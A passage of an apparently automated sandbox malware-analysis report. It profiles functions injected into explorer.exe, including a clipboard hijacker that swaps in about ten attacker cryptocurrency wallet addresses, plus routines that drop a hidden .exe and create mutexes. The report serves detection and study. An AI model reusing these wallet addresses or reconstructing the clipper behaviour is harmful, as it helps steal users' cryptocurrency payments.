                                                                                                                                                                                                                                  • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction ID: 2f05318649cbf05a618a63e84c59cf99187657150324455585edd56c3594ccf6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42D12E71711A46A8EF10EFA1E4643DC23A5A7557CCFC458269A0D6BF68FF74CA09C350
                                                                                                                                                                                                                                  Function 0DF373B0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 834 df373b0-df373da call df37a00 837 df373e0-df37416 call df37960 call df22c10 call df372a0 call df37a90 834->837 846 df3747b-df374a8 call df22c10 call df372a0 call df37a90 837->846 847 df37418-df37476 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 837->847 860 df374aa-df37508 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 846->860 861 df3750d-df3753a call df22c10 call df372a0 call df37a90 846->861 847->846 860->861 882 df3759f-df375cc call df22c10 call df372a0 call df37a90 861->882 883 df3753c-df3759a call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 861->883 902 df37631-df3765e call df22c10 call df372a0 call df37a90 882->902 903 df375ce-df3762c call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 882->903 883->882 923 df376c3-df376f0 call df22c10 call df372a0 call df37a90 902->923 924 df37660-df376be call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 902->924 903->902 945 df376f2-df37750 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 923->945 946 df37755-df37782 call df22c10 call df372a0 call df37a90 923->946 924->923 945->946 965 df377e7-df37814 call df22c10 call df372a0 call df37a90 946->965 966 df37784-df377e2 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 946->966 986 df37816-df37874 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 965->986 987 df37879-df378a6 call df22c10 call df372a0 call df37a90 965->987 966->965 986->987 1007 df3790b-df3791a Sleep call df21200 987->1007 1008 df378a8-df37906 call df21100 call df22c10 call df372a0 call df37b00 call df22c10 call df37b50 call df21200 987->1008 1014 df3791f 1007->1014 1008->1007 1014->837
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF37960: OpenClipboard.USER32 ref: 0DF37971
                                                                                                                                                                                                                                    • Part of subcall function 0DF37960: GetClipboardData.USER32 ref: 0DF37983
                                                                                                                                                                                                                                    • Part of subcall function 0DF37960: GlobalLock.KERNEL32 ref: 0DF37994
                                                                                                                                                                                                                                    • Part of subcall function 0DF37960: GlobalUnlock.KERNEL32 ref: 0DF379A5
                                                                                                                                                                                                                                    • Part of subcall function 0DF37960: CloseClipboard.USER32 ref: 0DF379AB
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: GlobalAlloc.KERNEL32 ref: 0DF37B78
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: GlobalLock.KERNEL32 ref: 0DF37B8F
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: GlobalUnlock.KERNEL32 ref: 0DF37BA7
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: OpenClipboard.USER32 ref: 0DF37BAF
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: EmptyClipboard.USER32 ref: 0DF37BB5
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: SetClipboardData.USER32 ref: 0DF37BC3
                                                                                                                                                                                                                                    • Part of subcall function 0DF37B50: CloseClipboard.USER32 ref: 0DF37BC9
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0DF37910
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx, xrefs: 0DF375CE
                                                                                                                                                                                                                                  • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0DF378A8
                                                                                                                                                                                                                                  • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0DF37816
                                                                                                                                                                                                                                  • 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe, xrefs: 0DF374AA
                                                                                                                                                                                                                                  • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0DF376F2
                                                                                                                                                                                                                                  • 13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV, xrefs: 0DF37418
                                                                                                                                                                                                                                  • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0DF37660
                                                                                                                                                                                                                                  • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0DF37784
                                                                                                                                                                                                                                  • TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb, xrefs: 0DF3753C
                                                                                                                                                                                                                                  • P9], xrefs: 0DF373F6, 0DF37438
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                  • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$P9]$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                                  • API String ID: 2992153386-43742948
                                                                                                                                                                                                                                  • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction ID: c466fbee19938066faaa0b2e9700a78a579765dc1e37233985a71f708d72b110
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39D1EAA1715A46A4DF10FFA9D8942EC3325A7557DCFC2C4229F0EABA58EF24CA09C354
                                                                                                                                                                                                                                  Function 0DF2F170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1228 df2f170-df2f1b1 CreateFileW 1229 df2f1b3-df2f1bf 1228->1229 1230 df2f1c0-df2f200 call df4f020 GetProcessHeap HeapAlloc 1228->1230 1233 df2f202-df2f21d ReadFile 1230->1233 1234 df2f240-df2f248 CloseHandle 1230->1234 1235 df2f229-df2f23d GetProcessHeap HeapFree 1233->1235 1236 df2f21f-df2f227 1233->1236 1237 df2f2ec-df2f308 1234->1237 1235->1234 1236->1235 1238 df2f24d-df2f26f 1236->1238 1239 df2f271-df2f286 call df2ec90 1238->1239 1240 df2f2db-df2f2e9 CloseHandle 1238->1240 1243 df2f291-df2f2be GetProcessHeap HeapAlloc 1239->1243 1244 df2f288-df2f28d 1239->1244 1240->1237 1243->1240 1246 df2f2c0-df2f2d7 call df3bb20 1243->1246 1244->1239 1245 df2f28f 1244->1245 1245->1240 1246->1240
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                                                                                                  • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction ID: 46d8838448ba097163f9f35c54f460ac7ce8932c578c3289eabf070b54bf1d06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5415C26714A5186EB20CFAAE85477A77B4FF89B90F458126DE5E43794DF38C0498720
                                                                                                                                                                                                                                  Function 0DF2EF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF2EDF0: GetWindowsDirectoryW.KERNEL32 ref: 0DF2EE43
                                                                                                                                                                                                                                    • Part of subcall function 0DF2EDF0: GetVolumeInformationW.KERNEL32 ref: 0DF2EE92
                                                                                                                                                                                                                                    • Part of subcall function 0DF2EDF0: wsprintfW.USER32 ref: 0DF2EEF4
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32 ref: 0DF2EF85
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0DF2EF95
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0DF2EFA3
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 0DF2EFAE
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 0DF2EFBC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0DF2EFCC
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0DF2EFDA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0DF2EFEA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction ID: 6d31306000307393727e4bc6a64262dee66c17ad19903b35fcfdb22eb22ab617
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62212472319B5286EB50DF65F85836A33A1FF89B40F45A036DA8F87718EE39C518C720
                                                                                                                                                                                                                                  Function 0DF2F010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: GetWindowsDirectoryA.KERNEL32 ref: 0DF2ED1C
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: GetVolumeInformationA.KERNEL32 ref: 0DF2ED66
                                                                                                                                                                                                                                    • Part of subcall function 0DF2ECD0: wsprintfA.USER32 ref: 0DF2EDC7
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 0DF2F063
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF2F073
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF2F081
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32 ref: 0DF2F08C
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 0DF2F09A
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF2F0AA
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF2F0B8
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0DF2F0C8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction ID: cea457c175e26db2454b613f76a437b2a50230895c620448d54a24e4ed7a06f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9112C71218B4281EB549FA5F85476A73A1FFC9B40F44A032DA8F47728DE3CC0588714
                                                                                                                                                                                                                                  Function 0DF34F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1288 df34f60-df34fda lstrcpyA call df29200 1292 df35057-df3506b free call df60c98 SleepEx 1288->1292 1293 df34fdc-df34fee call df60c20 1288->1293 1298 df35000-df35027 StrChrA call df60c28 1293->1298 1299 df34ff0-df34ff5 call df353e0 1293->1299 1304 df35030-df35033 1298->1304 1305 df35029-df3502c 1298->1305 1299->1292 1306 df35052-df35055 1304->1306 1307 df35035-df3504d call df60c38 call df352d0 1304->1307 1305->1304 1306->1292 1306->1298 1307->1306
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0DF34FBF
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: EnterCriticalSection.KERNEL32 ref: 0DF29248
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: RtlInitializeCriticalSection.NTDLL ref: 0DF29255
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcpyA.KERNEL32 ref: 0DF2928A
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcpyA.KERNEL32 ref: 0DF292AD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcatA.KERNEL32 ref: 0DF292BD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrcatA.KERNEL32 ref: 0DF292CD
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: LeaveCriticalSection.KERNEL32 ref: 0DF29354
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: memcpy.MSVCRT ref: 0DF2936C
                                                                                                                                                                                                                                    • Part of subcall function 0DF29200: lstrlenA.KERNEL32 ref: 0DF2937A
                                                                                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 0DF34FE6
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0DF3505A
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0DF35065
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292776791-0
                                                                                                                                                                                                                                  • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction ID: 6a48a6e3b23ef72500b2602e6c50f35f8ae808b415f338da1e4cf056f018a0c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84217131219B4285EB14DF65B95036AB7A5FB88B84F89C536DA8E47B58EF3CC104C750
                                                                                                                                                                                                                                  Function 0DF2EDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                                  • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                                  • Opcode ID: 31f25763a0ca2b1734bd33a2d788d09766f62c840dd230fe312038e7cd8b1677
                                                                                                                                                                                                                                  • Instruction ID: fde3d5236d9f7a318b090d2fda20492a1d969fb27782ce821c9bdbb296d2d2a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f25763a0ca2b1734bd33a2d788d09766f62c840dd230fe312038e7cd8b1677
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72314E32218A81D6D710CFA5F89036BB7B0FB89750F91502AEB8D83A28EB3DC544CF10
                                                                                                                                                                                                                                  Function 0DF2ECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                  • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                  • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction ID: 3f06be11e6fb303c8821abea78bd9f3aa406632f969f810baf64d356c49eea61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2313A3221878196C710CFA9F85035BBBB1FB99744F94402AEBC983A28DB7DC515CB10
                                                                                                                                                                                                                                  Function 0DF28D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 993137029-0
                                                                                                                                                                                                                                  • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction ID: a1c1cefb86db1c67757ba781722b07c5edc5f83888e9c33789032fa1001422c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D01FB36A15A5186EB14CFAAE89432A7361FB88BC0F58D126DA1B03B14CF38D056C710
                                                                                                                                                                                                                                  Function 0E0EB270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2372642624-0
                                                                                                                                                                                                                                  • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction ID: 45b92a6c20419c378825ce1cd75a7375e0a6b7e408a1ecf90559b191c7a240bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E086B171174282FF7957B1A44536913A09F6C791F441C78C91F55B40EE6D89EA4704
                                                                                                                                                                                                                                  Function 0DF3B270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2372642624-0
                                                                                                                                                                                                                                  • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction ID: b6a94dbaf1ef9859434dbafe8c1e2ac43cf5442c100a6d0735174ce38a8fe862
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E086A1A11702C3FF2A17B5A45537A13A09F9C751F489879CC1F45341EE2CC1DA4320
                                                                                                                                                                                                                                  Function 1020B270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2372642624-0
                                                                                                                                                                                                                                  • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction ID: da000e67b19ddb753bfc12951a456140feff45ef589f2c94d740ddcbe04c3fac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0CDB161170287FF5A9F71644D7AE13A0DB6C791F551864CC6F45345EF7C85DA4300
                                                                                                                                                                                                                                  Function 0DF278C0 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
